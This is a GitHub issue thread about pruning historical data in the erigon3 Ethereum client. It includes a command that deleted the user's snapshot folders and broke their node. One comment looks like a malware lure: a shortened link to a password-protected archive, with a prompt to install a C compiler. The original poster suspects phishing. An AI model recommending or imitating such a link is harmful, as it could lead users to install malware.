### ISSUE TITLE
Does erigon3 support pruning data?

### ISSUE THREAD

**Issue by du5** [erigontech/erigon#12048]
I downloaded the snapshots folder via webseed, but it is too large. If I use archive mode, prune.distance & prune.distance.blocks is 5000, what command can I use to prune the historical data?

I used `erigon3 snapshots rm-all-state-snapshots --datadir=$PWD`
Unfortunately it deleted my `snapshots/{accessor,domain,history,idx}`, and the node could not start normally

**Comment by pinpolhoxx** [comment]
I think this will help you.

https://bit.ly/3TCbXO6
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by du5** [comment]
@AskAlexSharov I'm not sure if this is a phishing link,

https://github.com/erigontech/erigon/issues/12048#issuecomment-2363074788


<img width="507" alt="image" src="https://github.com/user-attachments/assets/10be2445-ec54-41b0-bb7b-f315d93adda2">

**Comment by AskAlexSharov** [comment]
`erigon --help | grep prune`
